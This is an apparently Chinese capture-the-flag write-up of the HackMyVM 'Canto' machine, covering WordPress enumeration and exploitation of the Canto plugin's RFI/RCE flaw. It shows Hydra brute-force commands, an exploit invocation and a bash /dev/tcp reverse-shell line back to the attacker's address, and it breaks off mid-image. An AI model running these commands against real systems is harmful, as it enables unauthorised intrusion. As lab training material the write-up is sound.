{"id":697,"date":"2024-06-28T17:42:30","date_gmt":"2024-06-28T09:42:30","guid":{"rendered":"http:\/\/162.14.82.114\/?p=697"},"modified":"2024-06-28T17:42:30","modified_gmt":"2024-06-28T09:42:30","slug":"hmv-_-canto","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/697\/06\/28\/2024\/","title":{"rendered":"hmv[-_-]Canto"},"content":{"rendered":"<h1>Canto<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642155.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642155.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628144515948\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642156.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642156.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628150608725\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ rustscan -a 192.168.0.135 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.135:22\nOpen 192.168.0.135:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKkMLZHCokv5rpKTUUfitgdTSiyieZXC1kqsQS8DEnLgk6x5fOmlzHim2qgiwoJhyEJa7Nj1k3K6pwm5RVxEjEU=\n|   256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDR8+o8qabpIHzS2zgBZDxfX0Tm5eWBBstEt5QeYN04+\n80\/tcp open  http    syn-ack Apache httpd 2.4.57 ((Ubuntu))\n|_http-generator: WordPress 6.5.3\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Canto\n|_http-server-header: Apache\/2.4.57 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ curl -s http:\/\/192.168.0.135 | html2text | uniq   \n\nCanto\n    * Home\n    * Contact\n\n****** Start having your website more organized with Canto! 
******\nDownload<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.135\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html,txt,bak,zip\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.135\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,txt,bak,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/wp-content           (Status: 301) [Size: 319] [--&gt; http:\/\/192.168.0.135\/wp-content\/]\n\/license.txt          (Status: 200) [Size: 19915]\n\/wp-includes          (Status: 301) [Size: 320] [--&gt; http:\/\/192.168.0.135\/wp-includes\/]\n\/readme.html          (Status: 200) [Size: 7401]\n\/wp-admin             (Status: 301) [Size: 317] [--&gt; http:\/\/192.168.0.135\/wp-admin\/]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1102800 \/ 1102805 
(100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h3>wpscan\u626b\u63cf<\/h3>\n<p>\u7aef\u53e3\u626b\u63cf\u548c\u76ee\u5f55\u626b\u63cf\u90fd\u663e\u793a\u8fd9\u662f\u4e00\u4e2a<code>wordpress<\/code>\u7ad9\u70b9\uff0c\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ wpscan --url http:\/\/192.168.0.135 -e u --api-token xxxxxxx\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n[+] WordPress theme in use: twentytwentyfour\n | Location: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/\n | Latest Version: 1.1 (up to date)\n | Last Updated: 2024-04-02T00:00:00.000Z\n | Readme: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/readme.txt\n | [!] Directory listing is enabled\n | Style URL: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/style.css\n | Style Name: Twenty Twenty-Four\n | Style URI: https:\/\/wordpress.org\/themes\/twentytwentyfour\/\n | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. 
Its collecti...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\n |\n | Found By: Urls In Homepage (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/style.css, Match: &#039;Version: 1.1&#039;\n\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:02 &lt;=====================================================================&gt; (10 \/ 10) 100.00% Time: 00:00:02\n[i] User(s) Identified:\n\n[+] erik\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/192.168.0.135\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)<\/code><\/pre>\n<p>\u987a\u4fbf\u626b\u4e00\u4e0b\u63d2\u4ef6\uff1a<\/p>\n<pre><code class=\"language-text\">[i] No plugins Found.<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ whatweb http:\/\/192.168.0.135                                                                                              \nhttp:\/\/192.168.0.135 [200 OK] Apache[2.4.57], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.57 (Ubuntu)], IP[192.168.0.135], MetaGenerator[WordPress 6.5.5], Script[importmap,module], Title[Canto], UncommonHeaders[link], WordPress[6.5.5]<\/code><\/pre>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642157.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642157.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628154009689\" \/><\/div><\/p>\n<p>\u663e\u793a\u90fd\u662f\u63d2\u4ef6\u6f0f\u6d1e\uff0c\u4f46\u662f\u6ca1\u626b\u5230\u63d2\u4ef6\u4fe1\u606f\u3002<\/p>\n<h3>\u5c1d\u8bd5ssh\u7206\u7834<\/h3>\n<p>\u5f97\u5230\u4e86\u4e00\u4e2a\u7528\u6237\u540d<code>erik<\/code>\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b<code>ssh<\/code>\u548c<code>wpscan<\/code>\uff0c\u65f6\u95f4\u8f83\u957f<\/p>\n<pre><code class=\"language-bash\">hydra -l erik -P \/usr\/share\/wordlists\/rockyou.txt  ssh:\/\/192.168.0.135 2&gt;\/dev\/null\nwpscan --url http:\/\/192.168.0.135 -U erik -P \/usr\/share\/wordlists\/rockyou.txt --api-token xxxxxxx<\/code><\/pre>\n<p>\u7ee7\u7eed\u5c1d\u8bd5google\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281552464.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281552464.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628155215752\" \/><\/div><\/p>\n<h3>\u63d2\u4ef6\u641c\u7d22<\/h3>\n<p>\u4f46\u662f\u4e00\u65e0\u6240\u83b7\uff0c\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6\uff0c\u5c1d\u8bd5\u5bfb\u627e\u63d2\u4ef6\uff0c\u524d\u9762\u627e\u7684\u662f\u6bd4\u8f83\u53d7\u6b22\u8fce\u7684\u63d2\u4ef6\uff0c\u8fd9\u6b21\u8981\u6309\u63d2\u4ef6\u5e93\u8fdb\u884c\u641c\u5bfb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642158.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642158.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628160423760\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u4e0b\u9762\u662f\u641c\u7d22\u7ed3\u679c\uff0c\u53d1\u73b0\u82e5\u5e72\u63d2\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ wpscan --url http:\/\/192.168.0.135 -e ap --plugins-detection mixed --disable-tls-checks --api-token xxxxxxx\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            
\\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.0.135\/ [192.168.0.135]\n[+] Started: Fri Jun 28 03:59:45 2024\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.57 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.0.135\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.0.135\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.0.135\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.0.135\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 6.5.5 identified (Latest, released on 2024-06-24).\n | Found By: Rss Generator (Passive Detection)\n |  - 
http:\/\/192.168.0.135\/index.php\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=6.5.5&lt;\/generator&gt;\n |  - http:\/\/192.168.0.135\/index.php\/comments\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=6.5.5&lt;\/generator&gt;\n\n[+] WordPress theme in use: twentytwentyfour\n | Location: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/\n | Latest Version: 1.1 (up to date)\n | Last Updated: 2024-04-02T00:00:00.000Z\n | Readme: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/readme.txt\n | [!] Directory listing is enabled\n | Style URL: http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/style.css\n | Style Name: Twenty Twenty-Four\n | Style URI: https:\/\/wordpress.org\/themes\/twentytwentyfour\/\n | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\n |\n | Found By: Urls In Homepage (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/themes\/twentytwentyfour\/style.css, Match: &#039;Version: 1.1&#039;\n\n[+] Enumerating All Plugins (via Passive and Aggressive Methods)\n Checking Known Locations - Time: 00:04:03 &lt;=============================================================&gt; (105905 \/ 105905) 100.00% Time: 00:04:03[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] Plugin(s) Identified:\n\n[+] akismet\n | Location: http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/\n | Latest Version: 5.3.2 (up to date)\n | Last Updated: 2024-05-31T16:57:00.000Z\n | Readme: http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/readme.txt\n |\n | Found By: Known Locations (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/, status: 200\n |\n | Version: 5.3.2 (100% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n |  - 
http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/readme.txt\n | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/readme.txt\n\n[+] canto\n | Location: http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/\n | Last Updated: 2024-05-13T08:21:00.000Z\n | Readme: http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/readme.txt\n | [!] The version is out of date, the latest version is 3.0.8\n |\n | Found By: Known Locations (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/, status: 200\n |\n | [!] 4 vulnerabilities identified:\n |\n | [!] Title: Canto &lt;= 3.0.8 - Unauthenticated Blind SSRF\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/29c89cc9-ad9f-4086-a762-8896eba031c6\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-28976\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-28977\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-28978\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-24063\n |      - https:\/\/gist.github.com\/p4nk4jv\/87aebd999ce4b28063943480e95fd9e0\n |\n | [!] Title: Canto &lt; 3.0.5 - Unauthenticated Remote File Inclusion\n |     Fixed in: 3.0.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-3452\n |\n | [!] Title: Canto &lt; 3.0.7 - Unauthenticated RCE\n |     Fixed in: 3.0.7\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/1595af73-6f97-4bc9-9cb2-14a55daaa2d4\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2024-25096\n |      - https:\/\/patchstack.com\/database\/vulnerability\/canto\/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability\n |\n | [!] 
Title: Canto &lt;= 3.0.8 - Unauthenticated Remote File Inclusion\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3ea53721-bdf6-4203-b6bc-2565d6283159\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2024-4936\n |      - https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/id\/95a68ae0-36da-499b-a09d-4c91db8aa338\n |\n | Version: 3.0.4 (100% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/readme.txt\n | Confirmed By: Composer File (Aggressive Detection)\n |  - http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/package.json, Match: &#039;3.0.4&#039;\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 2\n | Requests Remaining: 17\n\n[+] Finished: Fri Jun 28 04:04:06 2024\n[+] Requests Done: 105921\n[+] Cached Requests: 40\n[+] Data Sent: 28.538 MB\n[+] Data Received: 14.227 MB\n[+] Memory used: 527.664 MB\n[+] Elapsed time: 00:04:20<\/code><\/pre>\n<h3>CVE-2023-3452<\/h3>\n<p>\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u540d\u4e3a<code>Canto<\/code>\u7684\u63d2\u4ef6\uff0c\u5c1d\u8bd5\u5229\u7528\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642159.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642159.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628161128383\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ searchsploit canto         \n----------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                                   |  Path\n----------------------------------------------------------------------------------------------------------------- ---------------------------------NetScanTools Basic Edition 2.5 - &#039;Hostname&#039; Denial of Service (PoC)                                              | windows\/dos\/45095.py\nWordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)                                                      | multiple\/webapps\/49189.txt\nWordpress Plugin Canto &lt; 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)                     | php\/webapps\/51826.py\n----------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ searchsploit -m php\/webapps\/51826.py \n  Exploit: WordPress Plugin Canto &lt; 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)\n      URL: https:\/\/www.exploit-db.com\/exploits\/51826\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/51826.py\n    Codes: N\/A\n Verified: False\nFile Type: Python script, ASCII text executable, with very long lines (344)\nCopied to: \/home\/kali\/temp\/canto\/51826.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto]\n\u2514\u2500$ python3 51826.py -u http:\/\/192.168.0.135 -LHOST 192.168.0.143 -c &#039;whoami&#039;   \nLocal web server on port 8080...\nExploitation URL: 
http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/includes\/lib\/download.php?wp_abspath=http:\/\/192.168.0.143:8080&amp;cmd=whoami\n192.168.0.135 - - [28\/Jun\/2024 04:14:23] &quot;GET \/wp-admin\/admin.php HTTP\/1.1&quot; 200 -\nServer response:\nwww-data<\/code><\/pre>\n<p>\u53d1\u73b0\u662f\u53ef\u4ee5\u7528\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-text\">bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/1234 &lt;&amp;1&quot;\nbash%20-c%20%22exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F192.168.0.143%2F1234%20%3C%261%22<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642160.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642160.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628162319023\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642161.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642161.png\" 
